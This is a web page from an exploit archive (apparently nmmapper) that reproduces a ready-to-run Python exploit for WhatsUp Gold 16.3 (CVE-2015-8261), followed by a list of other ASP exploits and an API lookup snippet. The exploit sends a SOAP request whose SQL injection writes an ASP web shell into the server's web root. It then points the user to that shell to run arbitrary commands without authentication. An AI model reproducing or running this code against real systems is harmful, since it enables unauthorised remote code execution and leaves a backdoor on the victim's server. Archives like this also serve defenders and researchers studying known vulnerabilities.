Menu

Search for hundreds of thousands of exploits

"WhatsUp Gold 16.3 - Remote Code Execution"

Author

"Matt Buzanowski"

Platform

asp

Release date

2016-01-13

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#
# Exploit Title: WhatsUp Gold v16.3 Unauthenticated Remote Code Execution
# Date: 2016-01-13
# Exploit Author: Matt Buzanowski
# Vendor Homepage: http://www.ipswitch.com/
# Version: 16.3.x
# Tested on: Windows 7 x86
# CVE : CVE-2015-8261
# Usage: python DroneDeleteOldMeasurements.py <target ip>

import requests
import sys

ip_addr = sys.argv[1]

shell = '''<![CDATA[<% response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall() %>]]>'''

sqli_str = '''stuff'; END TRANSACTION; ATTACH DATABASE 'C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\HTML\\NmConsole\\shell.asp' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('%s');--''' % shell

session = requests.Session()

headers = {"SOAPAction":"\"http://iDrone.alertfox.com/DroneDeleteOldMeasurements\"","User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.4927)","Expect":"100-continue","Content-Type":"text/xml; charset=utf-8","Connection":"Keep-Alive"}

body = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <DroneDeleteOldMeasurements xmlns="http://iDrone.alertfox.com/">
      <serializedDeleteOldMeasurementsRequest><?xml version="1.0" encoding="utf-16"?>
        <DeleteOldMeasurementsRequest xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <authorizationString>0123456789</authorizationString>
        <maxAgeInMinutes>1</maxAgeInMinutes>
        <iDroneName>%s</iDroneName>
        </DeleteOldMeasurementsRequest></serializedDeleteOldMeasurementsRequest>
    </DroneDeleteOldMeasurements>
  </soap:Body>
</soap:Envelope>""" % sqli_str

response = session.post("http://%s/iDrone/iDroneComAPI.asmx" % ip_addr,data=body,headers=headers)
print "Status code:", response.status_code
print "Response body:", response.content

print "\n\nSUCCESS!!! Browse to http://%s/NmConsole/shell.asp?cmd=whoami for unauthenticated RCE.\n\n" % ip_addr
Release Date Title Type Platform Author
2019-08-16 "Web Wiz Forums 12.01 - 'PF' SQL Injection" webapps asp n1x_
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2018-11-05 "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" webapps asp "Chris Lyne"
2018-05-29 "IssueTrak 7.0 - SQL Injection" webapps asp "Chris Anastasio"
2018-05-24 "ASP.NET jVideo Kit - 'query' SQL Injection" webapps asp AkkuS
2018-05-16 "totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery" webapps asp "Compass Security"
2018-03-30 "Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)" webapps asp "Todor Donev"
2018-03-30 "Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W316R Wireless Router 5.07.50 - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change" webapps asp "Todor Donev"
2017-08-31 "Sitefinity CMS 9.2 - Cross-Site Scripting" webapps asp "Pralhad Chaskar"
2017-09-22 "JitBit HelpDesk < 9.0.2 - Authentication Bypass" webapps asp Kc57
2017-09-18 "DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-18 "Digileave 1.2 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-18 "Digirez 3.4 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-13 "ICAffiliateTracking 1.1 - Authentication Bypass" webapps asp "Ihsan Sencan"
2017-06-05 "Kronos Telestaff < 2.92EU29 - SQL Injection" webapps asp "Goran Tuzovic"
2018-02-16 "EPIC MyChart - X-Path Injection" webapps asp "Shayan S"
2015-09-28 "Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload" webapps asp "Pedro Ribeiro"
2014-08-23 "LiveWorld Multiple Products - Cross Site Scripting" webapps asp "GulfTech Security"
2003-12-18 "ASPapp Multiple Products - Multiple Vulnerabilities" webapps asp "GulfTech Security"
2003-12-15 "DUWare Multiple Products - Multiple Vulnerabilities" webapps asp "GulfTech Security"
2016-06-07 "Cisco EPC 3928 - Multiple Vulnerabilities" webapps asp "Patryk Bogdan"
2016-06-06 "Notilus Travel Solution Software 2012 R3 - SQL Injection" webapps asp "Alex Haynes"
2016-05-24 "AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection" webapps asp "Mehmet Ince"
2016-05-06 "DotNetNuke 07.04.00 - Administration Authentication Bypass" webapps asp "Marios Nicolaides"
2016-02-22 "Thru Managed File Transfer Portal 9.0.2 - SQL Injection" webapps asp "SySS GmbH"
2016-01-13 "WhatsUp Gold 16.3 - Remote Code Execution" webapps asp "Matt Buzanowski"
2014-05-16 "CIS Manager - 'email' SQL Injection" webapps asp Edge
Release Date Title Type Platform Author
2016-01-13 "WhatsUp Gold 16.3 - Remote Code Execution" webapps asp "Matt Buzanowski"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/39231/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/39231/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/39231/37467/whatsup-gold-163-remote-code-execution/download/", "exploit_id": "39231", "exploit_description": "\"WhatsUp Gold 16.3 - Remote Code Execution\"", "exploit_date": "2016-01-13", "exploit_author": "\"Matt Buzanowski\"", "exploit_type": "webapps", "exploit_platform": "asp", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse